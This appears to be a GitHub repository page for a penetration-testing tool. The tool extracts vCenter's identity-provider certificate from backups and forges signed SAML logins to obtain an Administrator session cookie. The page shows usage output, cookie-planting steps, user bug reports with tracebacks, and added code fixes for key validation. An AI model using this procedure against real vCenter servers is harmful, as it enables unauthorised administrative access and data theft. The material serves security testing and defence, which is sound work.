A tool to extract the IdP cert from vCenter backups and log in as Administrator

Overview

vCenter SAML Login Tool

A tool to extract the Identity Provider (IdP) cert from vCenter backups and log in as Administrator

Background

Commonly, during engagements, we gain access to vCenter backups on a file server or gain root access to the VCSA host through recent CVEs. Logging into the vCenter vSphere UI lets us easily reach more systems and confidential information, and shows customers the impact of these findings.

The data.mdb file contains the certificates; it is found inside vCenter backups and, with root permissions, on the VCSA host itself. These certificates are stored in cleartext and can be used to sign a SAML authentication request for any user, including the built-in Administrator.

If you'd like to know more about several use cases for this tool and how we've used it to gain Administrative access to vCenter hosts check out our blog post: https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/

Usage

root@kali:~/vcenter# python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200
[*] Successfully extracted the IdP certificate
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcsa.olympus for 10.0.100.200
[*] Initiating SAML request with 10.0.100.200
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[+] Successfuly obtained Administrator cookie for 10.0.100.200!
[+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640

With the above cookie, visit the VCSA instance at https:// /ui, add the cookie under the /ui path, and re-browse to https:// /ui.

Demonstration

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

Comments
  • Exception: expected 302 redirect

    Exception: expected 302 redirect

    Hello,

    I keep getting this error and have no clue why that is.

    [*] Successfully extracted the IdP certificate
    [*] CN: cn=TrustedCertChain-1,cn=TrustedCertificateChains,cn=<redacted>.local,cn=Tenants,cn=IdentityManager,cn=Services,dc=<redacted>,dc=local
    [*] Domain: <redacted>.local
    [*] Successfully extracted trusted certificate 1
    [*] Successfully extracted trusted certificate 2
    [*] Obtaining hostname from vCenter SSL certificate
    [*] Found hostname <redacted>.<redacted>.local for <redacted>
    [*] Initiating SAML request with <redacted>
    [-] Failed initiating SAML request with <redacted>
    Traceback (most recent call last):
      File "/home/morpheus/stuff/vcenter_saml_login/vcenter_saml_login.py", line 347, in <module>
        req = saml_request(args.target)
      File "/home/morpheus/stuff/vcenter_saml_login/vcenter_saml_login.py", line 241, in saml_request
        raise Exception("expected 302 redirect")
    Exception: expected 302 redirect
    

    I did check a little bit and, if I understand correctly, the code expects a 302 redirect and raises an exception when it doesn't get one. The thing is, the host is making a 302 redirect but I'm still getting this exception. Any help or suggestions will be priceless. Thanks.

    opened by Blackh4n 9
  •  An error occurred

    An error occurred

    Hello, I can't execute python. It may be caused by the certificate. I need help.

    python3 vcenter_saml_login.py -p data.mdb -t 172.31.0.10
    [*] Successfully extracted the IdP certificate
    [-] Failed to find the trusted certificate 1
    Traceback (most recent call last):
      File "vcenter_saml_login.py", line 295, in <module>
        trusted_cert_1, domain = get_trusted_cert1(bin_stream, args.verbose)
    TypeError: cannot unpack non-iterable NoneType object

    opened by Hosrg 7
  • Failed logging in with SAML request.(expected 302 redirect)

    Failed logging in with SAML request.(expected 302 redirect)

    Any idea what could have gone wrong? Ver: VMware VirtualCenter 7.0.2 build-17920168

    [-] Failed logging in with SAML request
    Traceback (most recent call last):
      File "/Users/vcenter_saml_login.py", line 351, in <module>
        c = login(args.target, s)
      File "/Users/vcenter_saml_login.py", line 301, in login
        raise Exception("expected 302 redirect")
    Exception: expected 302 redirect
    Response: [400] An error occurred while processing the authentication response from the vCenter Single Sign-On server. Details: HTTP error code: 403, status: BadResponse, sub status: Issuer not trusted: .

    opened by kingz40o 1
  • Add license

    Add license

    Hello, I would like to contribute to the code by adding a more reliable validation for keys and certs, but there is no license in this repository. Please add some sort of license to the repository. No license generally means you have no permission from the creators of the software to use, modify, or share the software. More info here: https://choosealicense.com/no-permission/

    opened by bpg-it-raphaeljohn 1
  • Cookie not working

    Cookie not working

    Hello!

    The script reports Successfuly obtained Administrator cookie for .... but when I paste the value in the corresponding field the auth is not working, it just throws me back to the login screen. As I checked, it's working with vCenter 6.x but not successful in vCenter 7.0.3.

    Any idea? Thx!

    opened by Q1984 1
  • Fix 'get_domain_from_cn'

    Fix 'get_domain_from_cn'

    One should replace the 'lstrip' function call at 'get_domain_from_cn' with any alternative (e.g. 'removeprefix') since it strips extra characters (e.g. when the last domain part is 'dc=com').

    Thank you!

    opened by Resolk 1
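    The issue above reports that 'get_domain_from_cn' uses str.lstrip to remove the "dc=" prefix. lstrip takes a set of characters, not a literal prefix, so it also eats a leading "c" from "dc=com". The following is an added example written for this page, not the tool's own code: both functions are hypothetical reconstructions of the behaviour the issue describes, shown side by side so the defect is reproducible.

```python
# Added example (not vcenter_saml_login's own code): the str.lstrip() pitfall
# described in the 'get_domain_from_cn' issue, next to a corrected version.
# Both functions are hypothetical reconstructions of the reported behaviour.

def _dc_components(cn: str) -> list:
    """Return the 'dc=' components of an LDAP DN, in the order they appear."""
    parts = [p.strip() for p in cn.split(",")]
    return [p for p in parts if p.lower().startswith("dc=")]


def get_domain_from_cn_buggy(cn: str) -> str:
    """Join the dc= components into a dotted domain using str.lstrip.

    lstrip("dc=") strips any leading run of the characters 'd', 'c' and '=',
    not the literal prefix "dc=", so "dc=com" becomes "om".
    """
    return ".".join(p.lstrip("dc=") for p in _dc_components(cn))


def get_domain_from_cn_fixed(cn: str) -> str:
    """Join the dc= components into a dotted domain, removing only the prefix.

    Slicing off len("dc=") is the portable equivalent of str.removeprefix
    (Python 3.9+) and also handles an upper-case "DC=" component.
    """
    return ".".join(p[len("dc="):] for p in _dc_components(cn))


if __name__ == "__main__":
    # Constructed DN in the shape the tool prints; not taken from a real host.
    sample = "cn=TrustedCertChain-1,cn=TrustedCertificateChains,dc=example,dc=com"
    print("buggy:", get_domain_from_cn_buggy(sample))  # example.om
    print("fixed:", get_domain_from_cn_fixed(sample))  # example.com
```

    The buggy version happens to work for "dc=vsphere,dc=local" because neither component starts with a stripped character, which is why the defect only shows up on domains such as ".com" or ".dev".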
  • [-] Failed signing the SAML assertion ('Could not deserialize key data')

    [-] Failed signing the SAML assertion ('Could not deserialize key data')

    Did anyone else have issues with "Failed signing the SAML assertion"?

    python3 vcenter_saml_login.py -p data.mdb -t <IP>  -v
    [*] Extracted IdP certificate:
    -----BEGIN PRIVATE KEY-----
    ...
    -----END PRIVATE KEY-----
    
    [*] Successfully extracted the IdP certificate
    [!] Looking for cert 1 at position: 69734592
    [!] CN end position: 69735640
    [*] CN: cn=TrustedCertChain-1,cn=TrustedCertificateChains,cn=<DOMAIN>.<DOMAIN>,cn=Tenants,cn=IdentityManager,cn=Seces,dc=<DOMAIN>,dc=<DOMAIN>
    [*] Domain: <DOMAIN>.<DOMAIN>
    [!] Cert 1 size: 999
    [*] Extracted Trusted certificate:
    -----BEGIN CERTIFICATE-----
    ...
    -----END CERTIFICATE-----
    
    [*] Successfully extracted trusted certificate 1
    Cert 2 Size: 1053
    [*] Extracted Trusted certificate:
    -----BEGIN CERTIFICATE-----
    ...
    -----END CERTIFICATE-----
    
    [*] Successfully extracted trusted certificate 2
    [*] Obtaining hostname from vCenter SSL certificate
    [*] Found hostname <FQDN> for <IP>
    [*] Initiating SAML request with <IP>
    [*] Generating SAML assertion
    [*] Signing the SAML assertion
    [-] Failed signing the SAML assertion
    Traceback (most recent call last):
      File "<PATH>/Log4jCenter/utils/vcenter_saml_login/vcenter_saml_login.py", line 349, in <module>
        s = sign_assertion(t, trusted_cert_1, trusted_cert_2, idp_cert)
      File "<PATH>/Log4jCenter/utils/vcenter_saml_login/vcenter_saml_login.py", line 281, in sign_assertion
        signed_assertion = signer.sign(root, reference_uri=assertion_id, key=key, cert=[cert1, cert2])
      File "/usr/local/lib/python3.9/dist-packages/signxml/__init__.py", line 398, in sign
        key = load_pem_private_key(ensure_bytes(key), password=passphrase, backend=default_backend())
      File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/primitives/serialization/base.py", line 22, in load_pem_private_key
        return ossl.load_pem_private_key(data, password)
      File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/backends/openssl/backend.py", line 823, in load_pem_private_key
        return self._load_key(
      File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/backends/openssl/backend.py", line 1070, in _load_key
        self._handle_key_loading_error()
      File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/backends/openssl/backend.py", line 1129, in _handle_key_loading_error
        raise ValueError(
    ValueError: ('Could not deserialize key data. The data may be in an incorrect format, it may be encrypted with an unsupported algorithm, or it may be an unsupported key type (e.g. EC curves with explicit parameters).', [_OpenSSLErrorWithText(code=218529960, lib=13, reason=168, reason_text=b'error:0D0680A8:asn1 encoding routines:asn1_check_tlen:wrong tag'), _OpenSSLErrorWithText(code=218546234, lib=13, reason=58, reason_text=b'error:0D06C03A:asn1 encoding routines:asn1_d2i_ex_primitive:nested asn1 error'), _OpenSSLErrorWithText(code=218640442, lib=13, reason=58, reason_text=b'error:0D08303A:asn1 encoding routines:asn1_template_noexp_d2i:nested asn1 error'), _OpenSSLErrorWithText(code=1514987 lib=9, reason=13, reason_text=b'error:0907B00D:PEM routines:PEM_read_bio_PrivateKey:ASN1 lib')])
    
    

    I get the same error when trying to "check" the key with openssl:

     openssl rsa -in private.key -check    
       
    unable to load Private Key
    139866836145536:error:0D0680A8:asn1 encoding routines:asn1_check_tlen:wrong tag:../crypto/asn1/tasn_dec.c:1149:
    139866836145536:error:0D06C03A:asn1 encoding routines:asn1_d2i_ex_primitive:nested asn1 error:../crypto/asn1/tasn_dec.c:713:
    139866836145536:error:0D08303A:asn1 encoding routines:asn1_template_noexp_d2i:nested asn1 error:../crypto/asn1/tasn_dec.c:646:Field=version, Type=PKCS8_PRIV_KEY_INFO
    139866836145536:error:0907B00D:PEM routines:PEM_read_bio_PrivateKey:ASN1 lib:../crypto/pem/pem_pkey.c:88:
    
    opened by corsch 1
  • Add better validation of keys and certificates

    Add better validation of keys and certificates

    This should differentiate better between keys and certificates by adding a validation function for both. Probably fixes #6

    Thanks for adding the license.

    opened by bpg-it-raphaeljohn 0
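    Both the 'Could not deserialize key data' report above (OpenSSL complains of a "wrong tag" while reading the PKCS8 version field) and the pull request proposing better validation of keys and certificates come down to the same check: is the extracted PEM block structurally what its label claims? The following is an added example for this page, not the project's code and not the pull request's implementation. It uses only the standard library to validate PEM armor, base64 content and the outermost DER SEQUENCE, and distinguishes a key from a certificate by the tag of the first inner element (INTEGER version for PKCS#1/PKCS#8/SEC1 keys, SEQUENCE tbsCertificate for X.509). The sample DER blobs are constructed minimal structures, not real keys or certificates; a real loader such as cryptography's load_pem_private_key is still required afterwards.

```python
# Added example (not the project's code): structural pre-validation of PEM
# blocks, distinguishing private keys from certificates and rejecting data
# whose DER does not start with a SEQUENCE (the "wrong tag" case). Standard
# library only; a real loader must still parse the key afterwards.
import base64
import re

PEM_RE = re.compile(
    r"-----BEGIN (?P<label>[A-Z0-9 ]+)-----\s*"
    r"(?P<body>[A-Za-z0-9+/=\s]+?)\s*"
    r"-----END (?P=label)-----",
    re.DOTALL,
)

KEY_LABELS = {"PRIVATE KEY", "RSA PRIVATE KEY", "EC PRIVATE KEY"}
CERT_LABELS = {"CERTIFICATE"}

TAG_INTEGER = 0x02
TAG_SEQUENCE = 0x30


def outer_sequence_header_len(der: bytes):
    """Return the header length of the outer DER SEQUENCE, or None if the
    data does not start with a SEQUENCE whose declared length matches."""
    if len(der) < 2 or der[0] != TAG_SEQUENCE:
        return None
    first = der[1]
    if first < 0x80:                      # short-form length
        length, hdr = first, 2
    else:                                 # long-form length: 0x8n + n bytes
        n = first & 0x7F
        if n == 0 or n > 4 or len(der) < 2 + n:
            return None
        length = int.from_bytes(der[2:2 + n], "big")
        hdr = 2 + n
    if hdr + length != len(der):
        return None
    return hdr


def classify_pem(blob: str) -> str:
    """Return 'key', 'cert' or 'invalid' for a PEM-armored block."""
    m = PEM_RE.search(blob)
    if not m:
        return "invalid"
    label = m.group("label")
    try:
        der = base64.b64decode("".join(m.group("body").split()), validate=True)
    except ValueError:                    # binascii.Error is a ValueError
        return "invalid"
    hdr = outer_sequence_header_len(der)
    if hdr is None or hdr >= len(der):
        return "invalid"
    inner_tag = der[hdr]                  # tag of the first element inside
    if label in KEY_LABELS and inner_tag == TAG_INTEGER:
        return "key"                      # PKCS#1 / PKCS#8 / SEC1: INTEGER version
    if label in CERT_LABELS and inner_tag == TAG_SEQUENCE:
        return "cert"                     # X.509: SEQUENCE tbsCertificate
    return "invalid"                      # label and structure disagree


def pem_wrap(label: str, der: bytes) -> str:
    """Wrap DER bytes in PEM armor with 64-character lines."""
    b64 = base64.b64encode(der).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return f"-----BEGIN {label}-----\n" + "\n".join(lines) + f"\n-----END {label}-----\n"


# Constructed minimal DER structures for demonstration; not real key material.
SAMPLE_KEY_DER = bytes([0x30, 0x03, 0x02, 0x01, 0x00])   # SEQUENCE { INTEGER 0 }
SAMPLE_CERT_DER = bytes([0x30, 0x02, 0x30, 0x00])        # SEQUENCE { SEQUENCE {} }
SAMPLE_BAD_DER = bytes([0x02, 0x01, 0x00])               # top-level INTEGER: wrong tag

if __name__ == "__main__":
    for name, label, der in [("key", "PRIVATE KEY", SAMPLE_KEY_DER),
                             ("cert", "CERTIFICATE", SAMPLE_CERT_DER),
                             ("wrong tag", "PRIVATE KEY", SAMPLE_BAD_DER)]:
        print(f"{name:>9}: {classify_pem(pem_wrap(label, der))}")
```

    Running this over an extracted block before handing it to a signing library turns the deep OpenSSL traceback into a single "invalid" verdict and tells you whether the extraction picked up a certificate where a key was expected, which is the mix-up the validation pull request aims to catch.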
  • An error is reported when the script is running

    An error is reported when the script is running

    root@kent:~/CVE-2021-22005-exp# python3 vcenter_saml_login.py -p data.mdb -t xxx.xx.xxx.xxx
    [*] Successfully extracted the IdP certificate
    [*] CN: cn=TrustedCertChain-1,cn=TrustedCertificateChains,CN=e4ed3720-803d-4d2e-bbd1-3b5221182357,CN=Ldus,CN=ComponentManager,DC=vsphere,DC=local
    [*] Domain: vsphere.local
    [*] Successfully extracted trusted certificate 1
    [*] Successfully extracted trusted certificate 2
    [*] Obtaining hostname from vCenter SSL certificate
    [*] Found hostname vcenter.tech.zone for xxx.xx.xxx.xxx
    [*] Initiating SAML request with xxx.xx.xxx.xxx
    [*] Generating SAML assertion
    [*] Signing the SAML assertion
    [*] Attempting to log into vCenter with the signed SAML request
    [-] Failed logging in with SAML request
    Traceback (most recent call last):
      File "/root/CVE-2021-22005-exp/vcenter_saml_login.py", line 350, in <module>
        c = login(args.target, s)
      File "/root/CVE-2021-22005-exp/vcenter_saml_login.py", line 300, in login
        raise Exception("expected 302 redirect")
    Exception: expected 302 redirect

    xxx.xx.xxx.xxx is an Internet IP

    opened by Chinakentgao 6
  • vCenter 7.0.3 Support

    vCenter 7.0.3 Support

    I was recently on an engagement and identified a vCenter 7.0.3 server. After troubleshooting this script I determined that this version requires a POST parameter RelayState for successful authentication. This change adds the RelayState parameter to add support for vCenter 7.0.3.

    This could break compatibility with older versions and should be tested.

    opened by Xerzzul 2
Owner: Horizon 3 AI Inc (AI-powered Pen Tests. See your enterprise through the eyes of an attacker & fix what matters.)